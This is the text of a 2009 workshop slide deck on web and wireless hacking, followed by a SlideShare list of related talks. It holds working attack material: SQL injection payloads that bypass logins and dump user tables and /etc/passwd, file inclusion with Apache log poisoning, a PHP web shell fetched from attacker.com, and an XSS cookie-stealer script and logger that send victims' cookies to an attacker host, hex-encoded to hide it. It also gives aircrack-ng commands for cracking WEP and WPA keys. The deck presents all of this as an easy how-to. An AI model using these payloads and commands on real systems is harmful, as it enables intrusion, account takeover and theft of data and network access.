SlideShare a Scribd company logo

Web & Wireless Hacking

Don Anto
Don Anto

Complete Guide on Web & Wireless Hacking

Technology
1 of 80
Download to read offline
IPSECS WEB & WIRELESS HACKING Don “df0x” Anto Makasar, Juni 2009 www.ipsecs.com
IPSECS Content • Introduction • Web Exploitation – SQL Injection – File Inclussion – XSS • Breaking Wireless Infrastructure – War Driving – Exploiting Wireless Network www.ipsecs.com
IPSECS Introduction • Don “df0x” Anto • IT security researcher • Hacker?? Not, but IT security researcher • Contact – we@ipsecs.com • URL – http://ipsecs.com – http://kandangjamur.net • Bachelor degree in Electrical engineering • Add my facebook dj.antoxz@gmail.com www.ipsecs.com
IPSECS st 1 Day, WEB HACKING www.ipsecs.com
IPSECS Web Exploitation • It's exploiting web application programming flaws. • Programming mistakes are always happen. • Targeting clients or servers. • Possible to steal databases and other sensitif informations, steal cookie or session, execute arbitrary commands, or fully compromise the system. • It's easy to do. Google helps you :). www.ipsecs.com
IPSECS Common Web Exploitation • SQL Injection, an attack which's targeting sensitive information in database server. Possible to compromise system. • File Inclussion, an attack which usually to gain shell access on the remote target. – Local file inclussion – Remote file inclussion • Cross Site Scripting (XSS), an attack which targeting user or client of vulnerable website. – Doom – Persistent – Non-persistent www.ipsecs.com
IPSECS SQL INJECTION www.ipsecs.com
IPSECS SQL Injection • Injecting malicious SQL query to take profits. • Usually is used to bypass login, steal sensitive information on database. Further attack can be used in fully compromising system. • User input is not well validated or no sanitation process. • All examples and demos bellow are in PHP MySQL. www.ipsecs.com
IPSECS SQL Injection in login form • User input in login form is not validated before to be executed in database. • Attacker is possible to send arbitrary SQL query through login form and bypassing login process. • Attacker can also execute other SQL query. www.ipsecs.com
IPSECS Vulnerable Code • Example vulnerable code in login process: $pass = md5($_POST['password']); $query = "SELECT * FROM tblUser WHERE username = '" . $_POST['username'] . "' AND password = '" . $pass . "'"; $q = mysql_query($query); • Username which's sent from login form is not validated. www.ipsecs.com
IPSECS Exploit Login • Exploit code: username = admin' OR 'a'='a password = terserah • SQL query to be executed by database server is: SELECT * FROM tblUser WHERE username = 'admin' OR 'a'='a' AND password = 'e00b29d5b34c3f78df09d45921c9ec47' www.ipsecs.com
IPSECS SQL Injection in login form www.ipsecs.com
IPSECS SQL Logic • AND operator is executed before OR, result of query is: 'a'='a' AND password = 'e00b29d5b34c3f78df09d45921c9ec47' • Boolean logic result is FALSE, then: username = 'admin' OR FALSE • Boolean logic result is TRUE (admin). • Attacker successfully bypassing login form. www.ipsecs.com
IPSECS SQL Injection in URI parameter • Parameter input in URI is not validated before to be executed in database. • Attacker is possible to send arbitrary SQL query by modifying parameter input. www.ipsecs.com
IPSECS Vulnerable Code • Example vulnerable code while inputing URI parameters: $query = "SELECT * FROM news WHERE id=" . $_GET['aid'] ; $q = mysql_query($query); • Parameter 'aid' which's taken from URI is not validated. www.ipsecs.com
IPSECS Exploiting SQL Injection • Checking vulnerability using AND logic http://example.com/news.php?aid=1 AND 1=1-- http://example.com/news.php?aid=1 AND 1=0-- • Knowing number of field using UNION SELECT http://example.com/news.php?aid=1 UNION SELECT 1-- http://example.com/news.php?aid=1 UNION SELECT 1,2-- http://example.com/news.php?aid=1 UNION SELECT 1,2,3,..,n-- www.ipsecs.com
IPSECS Knowing Number of Field www.ipsecs.com
IPSECS SQL Injection in URI parameter • In Case table which generates “news” contains 3 fields www.ipsecs.com
IPSECS Exploiting SQL Injection • Knowing tables in database http://example.com/news.php?aid=-1 UNION SELECT 1,2,GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema=database()-- • Knowing fields in table 'tblUser' http://example.com/news.php?aid=-1 UNION SELECT 1,2,GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name='tblUser'-- OR IN HEXAL http://example.com/news.php?aid=-1 UNION SELECT 1,2,GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name=0x74626c55736572-- www.ipsecs.com
IPSECS Knowing Tables in DB www.ipsecs.com
IPSECS Exploiting SQL Injection • Viewing information in tables http://example.com/news.php?aid=-1 UNION SELECT 1,2,CONCAT_WS(0x2c,username,password,namaLengkap) FROM tblUser-- • Viewing arbitrary files (if FILE access is granted) http://example.com/news.php?aid=-1 UNION SELECT 1,2,LOAD_FILE('/etc/passwd')-- OR IN HEXAL http://example.com/news.php?aid=-1 UNION SELECT 1,2,LOAD_FILE(0x2f6574632f706173737764)-- www.ipsecs.com
IPSECS Viewing Table Records www.ipsecs.com
IPSECS FILE INCLUSSION www.ipsecs.com
IPSECS File Inclussion • Including malicious or sensitive file to be executed by server. • Usually is used to steal sensitive information, execute arbitrary command, or compromise system. • User input is not well validated or no sanitation process. • All examples and demos bellow are in PHP MySQL. www.ipsecs.com
IPSECS Local File Inclussion • Including sensitive file in local server (vulnerable server) to be executed by server. • Usually is used to steal sensitive information, execute arbitrary command. Further attack can be used in fully compromising system. • User input is not well validated or no sanitation process. www.ipsecs.com
IPSECS Vulnerable Code • Example vulnerable code: define('DOCROOT', '/var/www/html/modules'); $filename = DOCROOT . "/" . $_GET['module'] . ".php"; include($filename); • Parameter 'module' which's taken from URI is not validated. www.ipsecs.com
IPSECS Viewing Sensitive Files • Exploit code to viewing sensitive files on vulnerable system: http://example.com/index.php?module=../../../../../../../etc/passwd%00 http://example.com/index.php?module=../../../../../../../etc/group%00 www.ipsecs.com
IPSECS File /etc/passwd www.ipsecs.com
IPSECS Placing Malicious Log • Placing malicious apache log uses telnet to inject system command: $ telnet example.com 80 Trying example.com... Connected to example.com. Escape character is '^]'. GET /<?php passthru($_GET['cmd']) ?> HTTP/1.1 Host:example.com www.ipsecs.com
IPSECS Malicious Log www.ipsecs.com
IPSECS Executing Command • Executing command via access_log apache (in case apache log is readable) http://example.com/index.php? module=../../../../../../../usr/local/apache/logs/access_log %00&cmd=uname -a http://example.com/index.php? module=../../../../../../../usr/local/apache/logs/access_log %00&cmd=id www.ipsecs.com
IPSECS Command “id” www.ipsecs.com
IPSECS Remote File Inclussion • Including sensitive file in remote server (attacker server) to be executed by server. • Usually to execute arbitrary command using web shell. Further attack can be used in fully compormising system. • User input is not well validated or no sanitation process. www.ipsecs.com
IPSECS Vulnerable Code • Example vulnerable code: $filename = $_GET['page'] . ".php"; include($filename); • Parameter 'page' which's taken from URI is not validated. www.ipsecs.com
IPSECS PHP Shell • Simple web shell: <?php /*Basic PHP web shell injek.txt*/ if(isset($_GET['exec'])){ if(!empty($_GET['exec'])){ $cmd = $_GET['exec']; if(function_exists('passthru')){ passthru($cmd); } } } ?> www.ipsecs.com
IPSECS Public PHP Shell • Widely known web shell : r57, c99 • Commonly used in exploiting remote file inclussion. www.ipsecs.com
IPSECS r57 www.ipsecs.com
IPSECS Executing Command • Injecting command: http://example.com/view.php? page=http://attacker.com/injek.txt&exec=id http://example.com/view.php? page=http://attacker.com/injek.txt&exec=ls -al www.ipsecs.com
IPSECS Command 'ls -al' www.ipsecs.com
IPSECS CROSS SITE SCRIPTING www.ipsecs.com
IPSECS Cross Site Scripting • Inserting HTML/java script code to be executed by client browser which views vulnerable website. • Usually is used in stealing cookie on computer client, phising, and tricking user to download arbitrary file. • User input is not well validated or no sanitation process. • All examples and demos bellow are in PHP MySQL. www.ipsecs.com
IPSECS Cross Site Scripting • Doom based XSS, XSS in vulnerable file which comes from default installed software. • Non-Persistent XSS, XSS in vulnerable web page which can be exploited by tricking user to click malicious URI. Characteristic : temporal. • Persistent XSS, XSS in vulnerable web page which can be exploited to insert malicious code to database. Characteristic : permanent. www.ipsecs.com
IPSECS Vulnerable Code • Example vulnerable code: echo "<pre> Searching for ". $_GET['key'] . "...</pre><br/>n"; • Parameter 'key' which's sent from search form is not validated. www.ipsecs.com
IPSECS Cross Site Scripting • Checking if XSS vulnerable: http://example.com/search.php?key=<script>alert('XSS found dude!')</script> www.ipsecs.com
IPSECS Cross Site Scripting www.ipsecs.com
IPSECS Cookie Stealing • Stealing cookie: http://example.com/search.php?key=<script src="http://attacker.com/payload.js"></script> • Content payload.js document.location="http://attacker.com/cookie-save.php? c="+document.cookie www.ipsecs.com
IPSECS Cookie Grabber • Content of cookie-save.php: <?php /*Cookie stealer*/ $f = fopen('/tmp/cookie.txt', 'a'); $date = date("j F, Y, g:i a"); fwrite($f, "IP Address : ". $_SERVER['REMOTE_ADDR'] ."n". "Cookie : ". $_GET['c'] ."n". "Date and Time : ". $date ."n". "nn"); fclose($f); ?> www.ipsecs.com
IPSECS Hexal Encoding • Anonymize malicious URI using hexal encoding: http://example.com/search.php?key=<script src="http://attacker.com/payload.js"></script> HEXAL ENCODING http://example.com/search.php?key=%3c %73%63%72%69%70%74%20%73%72%63%3d %22%68%74%74%70%3a%2f%2f%61%74%74%61%63%6b %65%72%2e%63%6f%6d%2f%70%61%79%6c%6f%61%64%2e %6a%73%22%3e%3c%2f%73%63%72%69%70%74%3e www.ipsecs.com
IPSECS DEMO - Q&A WEB HACKING www.ipsecs.com
IPSECS THANK YOU! www.ipsecs.com
IPSECS nd 2 Day, WIRELESS HACKING www.ipsecs.com
IPSECS Wireless Network • Now, is widely used in campus, government, company, and many public places. • Provide network for mobile devices. • More flexible than wired network. • More insecure than wired network, so here we go! www.ipsecs.com
IPSECS War Driving • Activity to search Wi-Fi wireless network. • Public tools to do War Driving – Windows : NetStumbler, Wireshark – Linux : Kismet, AirCrack-ng, AirSnort, Wireshark – OSX : KisMac • I'm using Linux Ubuntu 8.10. www.ipsecs.com
IPSECS Kismet • Console based 802.11 wireless network detector and sniffer. • It identifies wireless network by pasively sniffing. • It's already exist on Ubuntu Repository or you can download from www.kismetwireless.net. • Use 'apt-get install kismet' on Ubuntu, read the README if you want to install from source. www.ipsecs.com
IPSECS Kismet www.ipsecs.com
IPSECS Kismet www.ipsecs.com
IPSECS Kismet www.ipsecs.com
IPSECS AirSnort • GUI based 802.11 wireless network detector. • Designed for WEP Cracker. • It isn't ready on my Ubuntu repository, download from www.sourceforge.net. • Read the README to install. www.ipsecs.com
IPSECS aircrack-ng (formerly : aircrack) • Console based 802.11 wireless network detector. • Designed for WEP & WPA-PSK Cracker. • It's already exist on Ubuntu repository or you can downlod from www.aircrack-ng.org. • Use 'apt-get install aircrack-ng' on Ubuntu, read the README if you want to install from source. www.ipsecs.com
IPSECS aircrack-ng (formerly : aircrack) airodump wlan0 www.ipsecs.com
IPSECS Wireshark • GUI based network protocol analyzer for UNIX and Windows. • The most complete protocol analyzer which support many data communication protocols. • It's already exist on Ubuntu repository or you can download from www.wireshark.org. • Use 'apt-get install wireshark' on Ubuntu,read the README if you want to install from source. www.ipsecs.com
IPSECS Wireshark www.ipsecs.com
IPSECS NetStumbler • Best known windows tool to find wireless networks. • It is function like Kismet on linux or KisMac on OSX. • You can download NetStumbler in www.netstumbler.com • Since I use ubuntu, there's no demo for this tool. www.ipsecs.com
IPSECS NetStumbler www.ipsecs.com
IPSECS Wireless Network Protection • MAC Filtering • WEP (Wired Equivalent Privacy) • WPA (Wi-Fi Protected Access) • WPA2 (Wi-Fi Protected Access 2) • Captive Portal www.ipsecs.com
IPSECS Exploiting Wireless Network • Miss Configuration (Human Error) • Spoofing • Cracking Protection • Denial of Service www.ipsecs.com
IPSECS Miss Configuration • Default Configuration on Device (Access Point) • Default Username & Password • Default Range IP Address • SNMP public & private community • No encryption enabled www.ipsecs.com
IPSECS Spoofing & Rogue AP • Spoofing MAC address to bypass MAC filtering. • Tools – Linux : ifconfig – Windows : smac, regedit • Creating Rogue AP to trick wireless user, then doing Man in The Middle and sniffing. • Tools – airsnarf http://airsnarf.shmoo.com www.ipsecs.com
IPSECS MAC Spoofing www.ipsecs.com
IPSECS WEP Cracking • WEP is based on RC4 algorithm and CRC32. • Collecting as much as possible weak IV (Insialization Vector) to be used in FMS attack. • Accelerated collecting IV using traffic injection. • Tools : aircrack-ng, AirSnort www.ipsecs.com
IPSECS WEP Cracking • Start interface on Monitor mode. • Run kismet to find AP target. • Find AP with connected clients on it. Or do fake authentication to associate with AP if no client connected. • Inject packet using aireplay-ng • Dump packet using airodump-ng • Crack dumped file using aircrack-ng www.ipsecs.com
IPSECS Dumping Packet airodump-ng -c 11 --bssid 00:1c:10:b3:59:38 -w /tmp/output wlan0 www.ipsecs.com
IPSECS Cracking Key aircrack-ng -z -b 00:1c:10:b3:59:38 /tmp/output-01.cap Key is “abcdef1234” www.ipsecs.com
IPSECS WPA Cracking • WPA is based on RC4 algorithm + TKIP/AES • WPA-PSK can be attack using dictionary attack. • Of course, it needs dictionary • Can be cracked when offline • Tools : aircrack-ng www.ipsecs.com
IPSECS WPA Cracking • Start interface on Monitor mode. • Run kismet to find AP target. • Find AP with which,s protected by WPA. • Dump packet using airodump-ng • Wait for a client to authenticate to AP, or deauthenticate client which's connected to AP. • Crack dumped file using aircrack-ng www.ipsecs.com
IPSECS WPA Cracking airodump-ng -c 11 --bssid 00:21:29:79:50:F1 -w /tmp/out-psk wlan0 www.ipsecs.com
IPSECS WPA Cracking aircrack-ng -w /usr/share/dict/words -b 00:21:29:79:50:F1 /tmp/out-psk*.cap Key is “miko2009” www.ipsecs.com
IPSECS Denial of Service • Making wireless network unavailable. • Tools : airjack, void11, aircrack www.ipsecs.com
IPSECS DEMO - Q&A WIRELESS HACKING www.ipsecs.com
IPSECS THANK YOU! www.ipsecs.com

Recommended

SANS @Night Talk: SQL Injection Exploited
SANS @Night Talk: SQL Injection ExploitedSANS @Night Talk: SQL Injection Exploited
SANS @Night Talk: SQL Injection ExploitedMicah Hoffman
 
Everyone Matters In Infosec 2014
Everyone Matters In Infosec 2014Everyone Matters In Infosec 2014
Everyone Matters In Infosec 2014Micah Hoffman
 
Pentesting iOS Apps
Pentesting iOS AppsPentesting iOS Apps
Pentesting iOS AppsHerman Duarte
 
Slides for the #JavaOne Session ID: CON11881
Slides for the #JavaOne Session ID: CON11881Slides for the #JavaOne Session ID: CON11881
Slides for the #JavaOne Session ID: CON11881Masoud Kalali
 
10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015
10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 201510 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015
10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015Scott Sutherland
 
Drupal and Security: What You Need to Know
Drupal and Security: What You Need to KnowDrupal and Security: What You Need to Know
Drupal and Security: What You Need to KnowAcquia
 
From 1000/day to 1000/sec: The Evolution of Incapsula's BIG DATA System [Surg...
From 1000/day to 1000/sec: The Evolution of Incapsula's BIG DATA System [Surg...From 1000/day to 1000/sec: The Evolution of Incapsula's BIG DATA System [Surg...
From 1000/day to 1000/sec: The Evolution of Incapsula's BIG DATA System [Surg...Imperva Incapsula
 
[Wroclaw #7] Security test automation
[Wroclaw #7] Security test automation[Wroclaw #7] Security test automation
[Wroclaw #7] Security test automationOWASP
 

Recommended

SANS @Night Talk: SQL Injection Exploited
SANS @Night Talk: SQL Injection ExploitedSANS @Night Talk: SQL Injection Exploited
SANS @Night Talk: SQL Injection ExploitedMicah Hoffman
 
Everyone Matters In Infosec 2014
Everyone Matters In Infosec 2014Everyone Matters In Infosec 2014
Everyone Matters In Infosec 2014Micah Hoffman
 
Pentesting iOS Apps
Pentesting iOS AppsPentesting iOS Apps
Pentesting iOS AppsHerman Duarte
 
Slides for the #JavaOne Session ID: CON11881
Slides for the #JavaOne Session ID: CON11881Slides for the #JavaOne Session ID: CON11881
Slides for the #JavaOne Session ID: CON11881Masoud Kalali
 
10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015
10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 201510 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015
10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015Scott Sutherland
 
Drupal and Security: What You Need to Know
Drupal and Security: What You Need to KnowDrupal and Security: What You Need to Know
Drupal and Security: What You Need to KnowAcquia
 
From 1000/day to 1000/sec: The Evolution of Incapsula's BIG DATA System [Surg...
From 1000/day to 1000/sec: The Evolution of Incapsula's BIG DATA System [Surg...From 1000/day to 1000/sec: The Evolution of Incapsula's BIG DATA System [Surg...
From 1000/day to 1000/sec: The Evolution of Incapsula's BIG DATA System [Surg...Imperva Incapsula
 
[Wroclaw #7] Security test automation
[Wroclaw #7] Security test automation[Wroclaw #7] Security test automation
[Wroclaw #7] Security test automationOWASP
 
Oracle security 08-oracle network security
Oracle security 08-oracle network securityOracle security 08-oracle network security
Oracle security 08-oracle network securityZhaoyang Wang
 
CanSecWest 2013 - iOS 6 Exploitation 280 Days Later
CanSecWest 2013 - iOS 6 Exploitation 280 Days LaterCanSecWest 2013 - iOS 6 Exploitation 280 Days Later
CanSecWest 2013 - iOS 6 Exploitation 280 Days LaterStefan Esser
 
SyScan Singapore 2011 - Stefan Esser - Targeting the iOS Kernel
SyScan Singapore 2011 - Stefan Esser - Targeting the iOS KernelSyScan Singapore 2011 - Stefan Esser - Targeting the iOS Kernel
SyScan Singapore 2011 - Stefan Esser - Targeting the iOS KernelStefan Esser
 
Attacking Drupal
Attacking DrupalAttacking Drupal
Attacking DrupalGreg Foss
 
Lateral Movement with PowerShell
Lateral Movement with PowerShellLateral Movement with PowerShell
Lateral Movement with PowerShellkieranjacobsen
 
2019 Blackhat Booth Presentation - PowerUpSQL
2019 Blackhat Booth Presentation - PowerUpSQL2019 Blackhat Booth Presentation - PowerUpSQL
2019 Blackhat Booth Presentation - PowerUpSQLScott Sutherland
 
[Wroclaw #7] AWS (in)security - the devil is in the detail
[Wroclaw #7] AWS (in)security - the devil is in the detail[Wroclaw #7] AWS (in)security - the devil is in the detail
[Wroclaw #7] AWS (in)security - the devil is in the detailOWASP
 
Java Secure Coding Practices
Java Secure Coding PracticesJava Secure Coding Practices
Java Secure Coding PracticesOWASPKerala
 
Not Big Data, AnyData
Not Big Data, AnyData Not Big Data, AnyData
Not Big Data, AnyData bsidesaugusta
 
Java application security the hard way - a workshop for the serious developer
Java application security the hard way - a workshop for the serious developerJava application security the hard way - a workshop for the serious developer
Java application security the hard way - a workshop for the serious developerSteve Poole
 
CodeMash 2.0.1.5 - Practical iOS App Attack & Defense
CodeMash 2.0.1.5 - Practical iOS App Attack & DefenseCodeMash 2.0.1.5 - Practical iOS App Attack & Defense
CodeMash 2.0.1.5 - Practical iOS App Attack & DefenseSeth Law
 
iWork recovery
iWork recoveryiWork recovery
iWork recoveryiWork Recovery
 
InSpec Workflow for DevOpsDays Riga 2017
InSpec Workflow for DevOpsDays Riga 2017InSpec Workflow for DevOpsDays Riga 2017
InSpec Workflow for DevOpsDays Riga 2017Mandi Walls
 
2017 Secure360 - Hacking SQL Server on Scale with PowerShell
2017 Secure360 - Hacking SQL Server on Scale with PowerShell2017 Secure360 - Hacking SQL Server on Scale with PowerShell
2017 Secure360 - Hacking SQL Server on Scale with PowerShellScott Sutherland
 
OWASP OTG-configuration (OWASP Thailand chapter november 2015)
OWASP OTG-configuration (OWASP Thailand chapter november 2015)OWASP OTG-configuration (OWASP Thailand chapter november 2015)
OWASP OTG-configuration (OWASP Thailand chapter november 2015)Noppadol Songsakaew
 
AWS ElasticBeanstalk Advanced configuration
AWS ElasticBeanstalk Advanced configurationAWS ElasticBeanstalk Advanced configuration
AWS ElasticBeanstalk Advanced configurationLionel LONKAP TSAMBA
 
Top Ten Proactive Web Security Controls v5
Top Ten Proactive Web Security Controls v5Top Ten Proactive Web Security Controls v5
Top Ten Proactive Web Security Controls v5Jim Manico
 
06 network automationwithansible
06 network automationwithansible06 network automationwithansible
06 network automationwithansibleKhairul Zebua
 
PowerUpSQL - 2018 Blackhat USA Arsenal Presentation
PowerUpSQL - 2018 Blackhat USA Arsenal PresentationPowerUpSQL - 2018 Blackhat USA Arsenal Presentation
PowerUpSQL - 2018 Blackhat USA Arsenal PresentationScott Sutherland
 
Attacking Oracle with the Metasploit Framework
Attacking Oracle with the Metasploit FrameworkAttacking Oracle with the Metasploit Framework
Attacking Oracle with the Metasploit FrameworkChris Gates
 
Secure your public WiFi
Secure your public WiFiSecure your public WiFi
Secure your public WiFiMartin Keg
 
Wireless Hacking
Wireless HackingWireless Hacking
Wireless HackingVIKAS SINGH BHADOURIA
 

More Related Content

What's hot

Oracle security 08-oracle network security
Oracle security 08-oracle network securityOracle security 08-oracle network security
Oracle security 08-oracle network securityZhaoyang Wang
 
CanSecWest 2013 - iOS 6 Exploitation 280 Days Later
CanSecWest 2013 - iOS 6 Exploitation 280 Days LaterCanSecWest 2013 - iOS 6 Exploitation 280 Days Later
CanSecWest 2013 - iOS 6 Exploitation 280 Days LaterStefan Esser
 
SyScan Singapore 2011 - Stefan Esser - Targeting the iOS Kernel
SyScan Singapore 2011 - Stefan Esser - Targeting the iOS KernelSyScan Singapore 2011 - Stefan Esser - Targeting the iOS Kernel
SyScan Singapore 2011 - Stefan Esser - Targeting the iOS KernelStefan Esser
 
Attacking Drupal
Attacking DrupalAttacking Drupal
Attacking DrupalGreg Foss
 
Lateral Movement with PowerShell
Lateral Movement with PowerShellLateral Movement with PowerShell
Lateral Movement with PowerShellkieranjacobsen
 
2019 Blackhat Booth Presentation - PowerUpSQL
2019 Blackhat Booth Presentation - PowerUpSQL2019 Blackhat Booth Presentation - PowerUpSQL
2019 Blackhat Booth Presentation - PowerUpSQLScott Sutherland
 
[Wroclaw #7] AWS (in)security - the devil is in the detail
[Wroclaw #7] AWS (in)security - the devil is in the detail[Wroclaw #7] AWS (in)security - the devil is in the detail
[Wroclaw #7] AWS (in)security - the devil is in the detailOWASP
 
Java Secure Coding Practices
Java Secure Coding PracticesJava Secure Coding Practices
Java Secure Coding PracticesOWASPKerala
 
Not Big Data, AnyData
Not Big Data, AnyData Not Big Data, AnyData
Not Big Data, AnyData bsidesaugusta
 
Java application security the hard way - a workshop for the serious developer
Java application security the hard way - a workshop for the serious developerJava application security the hard way - a workshop for the serious developer
Java application security the hard way - a workshop for the serious developerSteve Poole
 
CodeMash 2.0.1.5 - Practical iOS App Attack & Defense
CodeMash 2.0.1.5 - Practical iOS App Attack & DefenseCodeMash 2.0.1.5 - Practical iOS App Attack & Defense
CodeMash 2.0.1.5 - Practical iOS App Attack & DefenseSeth Law
 
InSpec Workflow for DevOpsDays Riga 2017
InSpec Workflow for DevOpsDays Riga 2017InSpec Workflow for DevOpsDays Riga 2017
InSpec Workflow for DevOpsDays Riga 2017Mandi Walls
 
2017 Secure360 - Hacking SQL Server on Scale with PowerShell
2017 Secure360 - Hacking SQL Server on Scale with PowerShell2017 Secure360 - Hacking SQL Server on Scale with PowerShell
2017 Secure360 - Hacking SQL Server on Scale with PowerShellScott Sutherland
 
OWASP OTG-configuration (OWASP Thailand chapter november 2015)
OWASP OTG-configuration (OWASP Thailand chapter november 2015)OWASP OTG-configuration (OWASP Thailand chapter november 2015)
OWASP OTG-configuration (OWASP Thailand chapter november 2015)Noppadol Songsakaew
 
AWS ElasticBeanstalk Advanced configuration
AWS ElasticBeanstalk Advanced configurationAWS ElasticBeanstalk Advanced configuration
AWS ElasticBeanstalk Advanced configurationLionel LONKAP TSAMBA
 
Top Ten Proactive Web Security Controls v5
Top Ten Proactive Web Security Controls v5Top Ten Proactive Web Security Controls v5
Top Ten Proactive Web Security Controls v5Jim Manico
 
06 network automationwithansible
06 network automationwithansible06 network automationwithansible
06 network automationwithansibleKhairul Zebua
 
PowerUpSQL - 2018 Blackhat USA Arsenal Presentation
PowerUpSQL - 2018 Blackhat USA Arsenal PresentationPowerUpSQL - 2018 Blackhat USA Arsenal Presentation
PowerUpSQL - 2018 Blackhat USA Arsenal PresentationScott Sutherland
 
Attacking Oracle with the Metasploit Framework
Attacking Oracle with the Metasploit FrameworkAttacking Oracle with the Metasploit Framework
Attacking Oracle with the Metasploit FrameworkChris Gates
 

What's hot (20)

Oracle security 08-oracle network security
Oracle security 08-oracle network securityOracle security 08-oracle network security
Oracle security 08-oracle network security
 
CanSecWest 2013 - iOS 6 Exploitation 280 Days Later
CanSecWest 2013 - iOS 6 Exploitation 280 Days LaterCanSecWest 2013 - iOS 6 Exploitation 280 Days Later
CanSecWest 2013 - iOS 6 Exploitation 280 Days Later
 
SyScan Singapore 2011 - Stefan Esser - Targeting the iOS Kernel
SyScan Singapore 2011 - Stefan Esser - Targeting the iOS KernelSyScan Singapore 2011 - Stefan Esser - Targeting the iOS Kernel
SyScan Singapore 2011 - Stefan Esser - Targeting the iOS Kernel
 
Attacking Drupal
Attacking DrupalAttacking Drupal
Attacking Drupal
 
Lateral Movement with PowerShell
Lateral Movement with PowerShellLateral Movement with PowerShell
Lateral Movement with PowerShell
 
2019 Blackhat Booth Presentation - PowerUpSQL
2019 Blackhat Booth Presentation - PowerUpSQL2019 Blackhat Booth Presentation - PowerUpSQL
2019 Blackhat Booth Presentation - PowerUpSQL
 
[Wroclaw #7] AWS (in)security - the devil is in the detail
[Wroclaw #7] AWS (in)security - the devil is in the detail[Wroclaw #7] AWS (in)security - the devil is in the detail
[Wroclaw #7] AWS (in)security - the devil is in the detail
 
Java Secure Coding Practices
Java Secure Coding PracticesJava Secure Coding Practices
Java Secure Coding Practices
 
Not Big Data, AnyData
Not Big Data, AnyData Not Big Data, AnyData
Not Big Data, AnyData
 
Java application security the hard way - a workshop for the serious developer
Java application security the hard way - a workshop for the serious developerJava application security the hard way - a workshop for the serious developer
Java application security the hard way - a workshop for the serious developer
 
CodeMash 2.0.1.5 - Practical iOS App Attack & Defense
CodeMash 2.0.1.5 - Practical iOS App Attack & DefenseCodeMash 2.0.1.5 - Practical iOS App Attack & Defense
CodeMash 2.0.1.5 - Practical iOS App Attack & Defense
 
iWork recovery
iWork recoveryiWork recovery
iWork recovery
 
InSpec Workflow for DevOpsDays Riga 2017
InSpec Workflow for DevOpsDays Riga 2017InSpec Workflow for DevOpsDays Riga 2017
InSpec Workflow for DevOpsDays Riga 2017
 
2017 Secure360 - Hacking SQL Server on Scale with PowerShell
2017 Secure360 - Hacking SQL Server on Scale with PowerShell2017 Secure360 - Hacking SQL Server on Scale with PowerShell
2017 Secure360 - Hacking SQL Server on Scale with PowerShell
 
OWASP OTG-configuration (OWASP Thailand chapter november 2015)
OWASP OTG-configuration (OWASP Thailand chapter november 2015)OWASP OTG-configuration (OWASP Thailand chapter november 2015)
OWASP OTG-configuration (OWASP Thailand chapter november 2015)
 
AWS ElasticBeanstalk Advanced configuration
AWS ElasticBeanstalk Advanced configurationAWS ElasticBeanstalk Advanced configuration
AWS ElasticBeanstalk Advanced configuration
 
Top Ten Proactive Web Security Controls v5
Top Ten Proactive Web Security Controls v5Top Ten Proactive Web Security Controls v5
Top Ten Proactive Web Security Controls v5
 
06 network automationwithansible
06 network automationwithansible06 network automationwithansible
06 network automationwithansible
 
PowerUpSQL - 2018 Blackhat USA Arsenal Presentation
PowerUpSQL - 2018 Blackhat USA Arsenal PresentationPowerUpSQL - 2018 Blackhat USA Arsenal Presentation
PowerUpSQL - 2018 Blackhat USA Arsenal Presentation
 
Attacking Oracle with the Metasploit Framework
Attacking Oracle with the Metasploit FrameworkAttacking Oracle with the Metasploit Framework
Attacking Oracle with the Metasploit Framework
 

Viewers also liked

Secure your public WiFi
Secure your public WiFiSecure your public WiFi
Secure your public WiFiMartin Keg
 
Mobile Revolution | Helthcare Technology Trend Presentation | 2009
Mobile Revolution | Helthcare Technology Trend Presentation | 2009Mobile Revolution | Helthcare Technology Trend Presentation | 2009
Mobile Revolution | Helthcare Technology Trend Presentation | 2009MK (Mary Kathryn) Tantum
 
Flippin gthe classroom using mobile technology - #PedagooLondon2015 presentation
Flippin gthe classroom using mobile technology - #PedagooLondon2015 presentationFlippin gthe classroom using mobile technology - #PedagooLondon2015 presentation
Flippin gthe classroom using mobile technology - #PedagooLondon2015 presentationMike Gunn
 
Role of sports in modern world For Speech 10 minutes
Role of sports in modern world For Speech 10 minutesRole of sports in modern world For Speech 10 minutes
Role of sports in modern world For Speech 10 minutesRasheen Mansil
 
Benefits of sports informative speech
Benefits of sports informative speechBenefits of sports informative speech
Benefits of sports informative speechwrightamanda14
 
Anti tree firesheep
Anti tree firesheepAnti tree firesheep
Anti tree firesheepantitree
 
Advanced WiFi Attacks Using Commodity Hardware
Advanced WiFi Attacks Using Commodity HardwareAdvanced WiFi Attacks Using Commodity Hardware
Advanced WiFi Attacks Using Commodity Hardwarevanhoefm
 
Gprs security threats and solutions
Gprs security threats and solutionsGprs security threats and solutions
Gprs security threats and solutionsJauwadSyed
 
Connector losses Optical Fiber Cable
Connector losses Optical Fiber CableConnector losses Optical Fiber Cable
Connector losses Optical Fiber CableKalyan Acharjya
 
Offline bruteforce attack on WiFi Protected Setup
Offline bruteforce attack on WiFi Protected SetupOffline bruteforce attack on WiFi Protected Setup
Offline bruteforce attack on WiFi Protected Setup0xcite
 
Wifi Password Hack v2.85 - The best software to hack the Wifi networks !
Wifi Password Hack v2.85 - The best software to hack the Wifi networks !Wifi Password Hack v2.85 - The best software to hack the Wifi networks !
Wifi Password Hack v2.85 - The best software to hack the Wifi networks !Home
 
Optical fiber communication
Optical fiber communicationOptical fiber communication
Optical fiber communicationRaj Kumar Morya
 
Evolution of mobile technology
Evolution of mobile technologyEvolution of mobile technology
Evolution of mobile technologyKiran Kumar
 
Offline bruteforce attack on wi fi protected setup
Offline bruteforce attack on wi fi protected setupOffline bruteforce attack on wi fi protected setup
Offline bruteforce attack on wi fi protected setupCyber Security Alliance
 
VLSI Training presentation
VLSI Training presentationVLSI Training presentation
VLSI Training presentationDaola Khungur
 

Viewers also liked (20)

Secure your public WiFi
Secure your public WiFiSecure your public WiFi
Secure your public WiFi
 
Wireless Hacking
Wireless HackingWireless Hacking
Wireless Hacking
 
WiFi Secuiry: Attack & Defence
